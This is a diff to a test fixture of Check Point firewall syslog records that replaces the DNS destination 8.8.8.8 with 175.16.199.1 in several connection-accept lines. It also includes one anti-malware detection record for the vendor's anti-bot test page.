-<134>1 2020-03-29T17:25:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9ed,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502701"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59723"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9ed,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52158"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9ed,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502701"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59723"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9ed,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"136.243.95.176"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54328"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9ee,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:25:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9ef,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502703"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56427"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9ef,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502703"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42889"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9ef,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502703"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56427"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9ef,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502703"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42889"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9ef,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"209.87.209.101"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35278"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502704"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38875"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502704"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38875"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f0,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"72.246.28.170"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56338"; service:"80"; service_id:"http"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:04Z gw-da58d3 CheckPoint 8363 - [action:"Detect"; flags:"444672"; ifdir:"outbound"; ifname:"eth1"; loguid:"{0x5e80d9f0,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; confidence_level:"5"; dst:"72.246.28.170"; http_host:"sc1.checkpoint.com"; log_id:"2"; malware_action:"Communication with C&C site"; malware_family:"Check Point"; malware_rule_id:"{227D6BCD-3280-4894-B0EB-0FF6A5FEACF1}"; method:"GET"; policy:"Standard"; policy_time:"1585502567"; product:"Anti Malware"; protection_id:"00233CFEE"; protection_name:"Check Point - Testing Bot"; protection_type:"URL reputation"; proto:"6"; proxy_src_ip:"192.168.2.2"; resource:"http://sc1.checkpoint.com/za/images/threatwiki/pages/TestAntiBotBlade.html"; s_port:"56338"; scope:"192.168.2.2"; service:"80"; session_id:"{0x5e80d9f0,0x2,0x353707c7,0xee78a1dc}"; severity:"2"; smartdefense_profile:"Optimized"; src:"192.168.2.2"; layer_name:"Standard Threat Prevention"; layer_uuid:"{0DBE7C44-6D3F-4F28-8F2B-0E6790E57F8A}"; malware_rule_id:"{227D6BCD-3280-4894-B0EB-0FF6A5FEACF1}"; smartdefense_profile:"Optimized"; user_agent:"Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"; web_client_type:"Firefox"]
 <134>1 2020-03-29T17:25:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585502705"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56340"; service:"80"; service_id:"http"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585502705"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56342"; service:"80"; service_id:"http"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f1,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585502705"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56344"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f1,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502705"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49461"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f1,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502705"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49461"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f1,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585502705"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56346"; service:"80"; service_id:"http"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f1,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585502705"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56348"; service:"80"; service_id:"http"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f1,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585502705"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56350"; service:"80"; service_id:"http"; src:"192.168.2.2"]
@@ -2821,27 +2821,27 @@
 <134>1 2020-03-29T17:25:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585502706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59060"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f2,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585502706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59062"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f2,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585502706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59064"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f2,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58207"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f2,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58207"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f2,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"172.217.17.110"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42424"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f2,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46013"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
